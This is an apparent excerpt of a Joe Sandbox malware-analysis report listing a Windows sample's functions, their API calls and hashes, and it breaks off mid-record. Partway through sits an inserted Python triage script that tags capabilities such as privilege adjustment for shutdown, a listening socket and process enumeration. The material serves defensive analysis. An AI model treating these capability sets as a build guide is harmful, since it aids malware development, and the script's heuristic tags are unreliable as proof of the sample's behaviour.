                                                            • Instruction ID: 440b2268a02deaeca06cff9f86f9ecba8b5a91fcf1543e6dadb6c1be2da3faf6
                                                            • Opcode Fuzzy Hash: 2d8c31020f1ea649008d9461956e65ef75a72121e6ef695efc761845562ed0c8
                                                            • Instruction Fuzzy Hash: 6841E339B00214AFEB10AF64DC86F6EB7E89F19724F04805CF90AAB3D2DB709D418791
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 7633ac052789a9819c0ac971726a351509cb778966258fff0ad33198d6e7ad92
                                                            • Instruction ID: 5bd096827c839691f8df73ee833242d6f349491ef33784522ad18e293da52a83
                                                            • Opcode Fuzzy Hash: 7633ac052789a9819c0ac971726a351509cb778966258fff0ad33198d6e7ad92
                                                            • Instruction Fuzzy Hash: 961190317109317BE7211FA6EC48B3BB7ADEF55721B848039E906D7251CB7099128AA4
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 0020C69D
                                                            • CoCreateInstance.OLE32(00232D6C,00000000,00000001,00232BDC,?), ref: 0020C6B5
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                            • CoUninitialize.OLE32 ref: 0020C922
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                            • String ID: .lnk
                                                            • API String ID: 2683427295-24824748
                                                            • Opcode ID: 4384f184648ea5da8b38fcc4b35ccc1e43b8ced21ca96b30cce09f0da4a75e78
                                                            • Instruction ID: 0b60981c7723d2f961785b9b2cd04f9083c13655bf9cf1e71ae9cff0541b922d
                                                            • Opcode Fuzzy Hash: 4384f184648ea5da8b38fcc4b35ccc1e43b8ced21ca96b30cce09f0da4a75e78
                                                            • Instruction Fuzzy Hash: FBA13B75208305AFD700EF64C881EABB7ECEF95704F00496DF156971A2EB71EA49CB62
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,001E1D88,?), ref: 0021C312
                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0021C324
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 2574300362-1816364905
                                                            • Opcode ID: eaeafb94392474d1852f828a311802e31655b09b315896dc1d3621b67bc95aae
                                                            • Instruction ID: 5331eb86c514a618988719fc1935dc63c68dad9dc28b161adcf98abc5477fe27
                                                            • Opcode Fuzzy Hash: eaeafb94392474d1852f828a311802e31655b09b315896dc1d3621b67bc95aae
                                                            • Instruction Fuzzy Hash: 2CE08C78660313DFCB704F65E908A8676E4EB19705B908479E8AAD2260E770D8A1CA60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID:
                                                            • API String ID: 674341424-0
                                                            • Opcode ID: b618b29bd048053e9f6f242646d7beae176185a45f937a3ec26b3bf22e415182
                                                            • Instruction ID: e30389b1f8db8722833de7399824fa672c0d773979e32b2717d36daf4c743584
                                                            • Opcode Fuzzy Hash: b618b29bd048053e9f6f242646d7beae176185a45f937a3ec26b3bf22e415182
                                                            • Instruction Fuzzy Hash: 4522AB716087419FD724DF24C891BAFB7E5BF99300F10492DF9AA97291DB30EA44CB92
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0021F151
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0021F15F
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0021F21F
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0021F22E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                            • String ID:
                                                            • API String ID: 2576544623-0
                                                            • Opcode ID: 6d465ba3c5710b6df88ee07f818e56c1c621668285380ccbf8b5998e217b5d15
                                                            • Instruction ID: ad37c28f7dcf6c04e6d1178a547f14b6631953e52f1b716aeedc6d109710a821
                                                            • Opcode Fuzzy Hash: 6d465ba3c5710b6df88ee07f818e56c1c621668285380ccbf8b5998e217b5d15
                                                            • Instruction Fuzzy Hash: 41519175508301AFD310EF20DC85EABB7E8FFA9710F50492DF495972A1EB709A44CB92
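The records above all share one layout: an "APIs" list of call sites (with "Part of subcall function" entries for calls reached indirectly), a "String ID" list joined with `$`, and a "Similarity" block ending in the instruction fuzzy hash. When triaging a long listing like this it helps to pull each record's API set and strings out mechanically and tag the combinations worth a second look, such as LookupPrivilegeValueW/AdjustTokenPrivileges with the SeShutdownPrivilege string beside ExitWindowsEx, socket/bind/listen, or CreateToolhelp32Snapshot with Process32FirstW. The script below is an added example written for this page; it is not Joe Sandbox code or anything extracted from the sample. The sample input is constructed by abridging three of the records shown here (the dump-source lines are left out of two of them to show they are skipped), the record boundary is assumed to be the "Instruction Fuzzy Hash" line, and the capability rules are the author's own coarse heuristics. Bear in mind that in a compiled AutoIt binary most such functions belong to the AutoIt runtime itself, so a tag marks a capability present in the image, not necessarily code the script actually calls.

```python
"""Parse the per-function "APIs / Strings / Similarity" records of a Joe Sandbox
disassembly listing and tag each record with the capability its API set implies.
Added triage example for this page; not Joe Sandbox or sample code."""
import re
from dataclasses import dataclass, field

# Constructed sample in the report's own layout: three records abridged from the
# listing (Toolhelp32 enumeration, SeShutdownPrivilege/ExitWindowsEx, TCP listener).
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0021F151
• Process32FirstW.KERNEL32(00000000,?), ref: 0021F15F
  • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
• Process32NextW.KERNEL32(00000000,?), ref: 0021F21F
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 0021F22E
Memory Dump Source
• Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
• Instruction Fuzzy Hash: 41519175508301AFD310EF20DC85EABB7E8FFA9710F50492DF495972A1EB709A44CB92
APIs
  • Part of subcall function 001F8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001F8D0D
  • Part of subcall function 001F8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001F8D3A
  • Part of subcall function 001F8CC3: GetLastError.KERNEL32 ref: 001F8D47
• ExitWindowsEx.USER32(?,00000000), ref: 0020549B
Strings
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
• Instruction Fuzzy Hash: D6012431674B266AE7786E74AC4ABFB7268EB05342F200530FD06D20D3DAA00CA089A0
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002165EF
• WSAGetLastError.WSOCK32(00000000), ref: 002165FE
• bind.WSOCK32(00000000,?,00000010), ref: 0021661A
• listen.WSOCK32(00000000,00000005), ref: 00216629
• closesocket.WSOCK32(00000000,00000000), ref: 00216657
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
• Instruction Fuzzy Hash: 2721D035200205AFCB10EF64D989B6EB7F9EF59320F108169E916E73E1CB70AD81CB51
"""

# One API call line: optional "Part of subcall function XXXX:" prefix, then
# Name.MODULE, an optional argument list, and the call-site "ref:" address.
API_LINE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?"
    r"(?P<name>[\w@:]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$"
)

# Heuristic capability rules (author's assumption, not part of the report):
# label, APIs that must all be present, and an optional string that must appear.
CAPABILITY_RULES = [
    ("process enumeration via Toolhelp32", {"CreateToolhelp32Snapshot", "Process32FirstW"}, None),
    ("enables SeShutdownPrivilege", {"LookupPrivilegeValueW", "AdjustTokenPrivileges"}, "SeShutdownPrivilege"),
    ("logoff/shutdown via ExitWindowsEx", {"ExitWindowsEx"}, None),
    ("listening TCP socket", {"socket", "bind", "listen"}, None),
    ("dynamic import via GetProcAddress", {"LoadLibraryA", "GetProcAddress"}, None),
    ("shell link (.lnk) handling via COM", {"CoCreateInstance"}, ".lnk"),
]


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # (name, module, ref, subcall function or None)
    strings: list = field(default_factory=list)  # "String ID" entries, '$'-separated in the report
    api_string_id: str = ""
    fuzzy_hash: str = ""

    def api_names(self) -> set:
        # Subcall APIs count too: the parent is what reaches them, as with
        # LookupPrivilegeValueW sitting behind the ExitWindowsEx caller.
        return {name for name, _module, _ref, _sub in self.apis}


def parse_records(text: str) -> list:
    """Split the listing into FunctionRecords; a record closes at its fuzzy hash."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            cur.apis.append((m["name"], m["module"], m["ref"], m["sub"]))
        elif line.startswith("• String ID:"):
            cur.strings = [s.strip() for s in line.split(":", 1)[1].split("$") if s.strip()]
        elif line.startswith("• API String ID:"):
            cur.api_string_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = FunctionRecord()
    return records


def capabilities(rec: FunctionRecord) -> list:
    """Labels from CAPABILITY_RULES whose API set (and string, if any) the record contains."""
    names = rec.api_names()
    return [label for label, needed, needle in CAPABILITY_RULES
            if needed <= names and (needle is None or needle in rec.strings)]


def triage(text: str) -> list:
    """One summary dict per record, in listing order."""
    return [{"api_string_id": r.api_string_id, "apis": sorted(r.api_names()),
             "strings": r.strings, "capabilities": capabilities(r)}
            for r in parse_records(text)]


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row["api_string_id"], row["capabilities"], row["strings"])
```

Run it against the text of a full listing instead of SAMPLE to get one row per function; the "API String ID" value is a stable key for comparing hits across reports of related samples, and the `fuzzy_hash` field is kept on each record for the same purpose.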
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001FEB19
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: c57ba5ca496348ef440792603291fa4707de0120a3f7d4058e5bcef3eb3be28a
                                                            • Instruction ID: ef3ea67f8d42c81c46706d5076f93ea5a1931ee57a5b8920990d6b1c035746de
                                                            • Opcode Fuzzy Hash: c57ba5ca496348ef440792603291fa4707de0120a3f7d4058e5bcef3eb3be28a
                                                            • Instruction Fuzzy Hash: 3E321575A007059FD728CF19C481A6AB7F1FF48320B15C56EE99ADB3A1EB70E981CB44
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 002126D5
                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0021270C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: e9b07278d3e5f45d5ba51a83547eda192d29f0f4c317f33accd8560356feaeeb
                                                            • Instruction ID: 6f2b905de3e4ac7546a388170a62c4d704fe4f909c0ca47d5b451e2dbc12495e
                                                            • Opcode Fuzzy Hash: e9b07278d3e5f45d5ba51a83547eda192d29f0f4c317f33accd8560356feaeeb
                                                            • Instruction Fuzzy Hash: 0E41D57152024AFFEB24DE94DC85EFBB7FCEB60314F10406EF601A6180EAB09DB99654
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0020B5AE
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0020B608
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0020B655
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: 15f388af5ee9e5941d998c37a5eba45c5619860515a72f15af01984d50c20573
                                                            • Instruction ID: 3155f25de49f3b530dfa4e3af324d24e285eb0d57914c08802f79907be84362a
                                                            • Opcode Fuzzy Hash: 15f388af5ee9e5941d998c37a5eba45c5619860515a72f15af01984d50c20573
                                                            • Instruction Fuzzy Hash: F3217135A10618EFCB00EFA5D885EADBBB8FF49310F1480A9E905EB361DB319956CF51
                                                            APIs
                                                              • Part of subcall function 001C0FF6: std::exception::exception.LIBCMT ref: 001C102C
                                                              • Part of subcall function 001C0FF6: __CxxThrowException@8.LIBCMT ref: 001C1041
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001F8D0D
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001F8D3A
                                                            • GetLastError.KERNEL32 ref: 001F8D47
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1922334811-0
                                                            • Opcode ID: d462fdc7c092a3f8dc17c42443793cf3e054f2c34c6b826dd70133d5173942b6
                                                            • Instruction ID: 9f7a86bfc6cab6b54fd8f1156fc4cbfa2b7a19965a1c42156c9dfffa7cff667d
                                                            • Opcode Fuzzy Hash: d462fdc7c092a3f8dc17c42443793cf3e054f2c34c6b826dd70133d5173942b6
                                                            • Instruction Fuzzy Hash: 21116DB1414209AFD7289F94ED85D7BB7BCEB54710B20852EF45696241EB30A8418A60
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0020404B
                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00204088
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00204091
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                            • String ID:
                                                            • API String ID: 33631002-0
                                                            • Opcode ID: 35c085cd58d6796f7a7d8af361ef1ad6e066875dd69379396c4c6dfa9810c6da
                                                            • Instruction ID: 7dff88e9e68f4680ebdaa4a941106022938731db6f42f43ec790fa8e9074a7be
                                                            • Opcode Fuzzy Hash: 35c085cd58d6796f7a7d8af361ef1ad6e066875dd69379396c4c6dfa9810c6da
                                                            • Instruction Fuzzy Hash: F11182B1D14329BEE7209BE8ED48FAFBBBCEB08710F004656BA04F7191C2B45D1587A1
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00204C2C
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00204C43
                                                            • FreeSid.ADVAPI32(?), ref: 00204C53
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 48723913ece8e8f7e443e5cea168d868b0cf31062f84e3d3ec0d75797335b9ad
                                                            • Instruction ID: 7b1e2fcb57adb563239f14f4f52eed2a883e5902fe1da40359e3e82bbbc16939
                                                            • Opcode Fuzzy Hash: 48723913ece8e8f7e443e5cea168d868b0cf31062f84e3d3ec0d75797335b9ad
                                                            • Instruction Fuzzy Hash: D4F03775A11309BBDB04DFE0AD89AAEBBB8EB08201F0044A9AA01E2181E6706A448B50
                                                            APIs
                                                            • __time64.LIBCMT ref: 00208B25
                                                              • Part of subcall function 001C543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,002091F8,00000000,?,?,?,?,002093A9,00000000,?), ref: 001C5443
                                                              • Part of subcall function 001C543A: __aulldiv.LIBCMT ref: 001C5463
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            • String ID: 0u&
                                                            • API String ID: 2893107130-1534014668
                                                            • Opcode ID: f39ecc155a1ec482a78ae2eba87a5969b7a7b97c6615475c00b320098682c1f5
                                                            • Instruction ID: 2e45564bcd0f5b787ec32acfd9f97e32360b412ec1b8710021ccbcf2f7726221
                                                            • Opcode Fuzzy Hash: f39ecc155a1ec482a78ae2eba87a5969b7a7b97c6615475c00b320098682c1f5
                                                            • Instruction Fuzzy Hash: D721E4726356108BC329CF25E441A52B3E1EBA5321B288E6CD4E6CB2D0DA74B945CB94
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f82f836850c06c23e5de6cc994a8662280981bbe25b9fc68a968144bdf952ad5
                                                            • Instruction ID: 290d7ba1d6b13bdbf10a9e4663c3c5d631321e620b75e602bc3b2f6156fac361
                                                            • Opcode Fuzzy Hash: f82f836850c06c23e5de6cc994a8662280981bbe25b9fc68a968144bdf952ad5
                                                            • Instruction Fuzzy Hash: AA22AE78A00216DFDB24DF54C494BBEBBF5FF1A300F14846AE856AB341E730A985CB91
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0020C966
                                                            • FindClose.KERNEL32(00000000), ref: 0020C996
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: c86d33be7bb18810d98a5f3aaadc6becfb7f526df8276d3a4c5bb91fae4b2bde
                                                            • Instruction ID: 8e8bdf8f356996385ad08d4d58a4a6f086d0cd941dbb12905c4e02c9c627b6da
                                                            • Opcode Fuzzy Hash: c86d33be7bb18810d98a5f3aaadc6becfb7f526df8276d3a4c5bb91fae4b2bde
                                                            • Instruction Fuzzy Hash: 3911C4766106149FD710EF29D849A3AF7E9FF95324F00865EF8A9D72A1DB30AC01CB81
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0021977D,?,0022FB84,?), ref: 0020A302
                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0021977D,?,0022FB84,?), ref: 0020A314
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
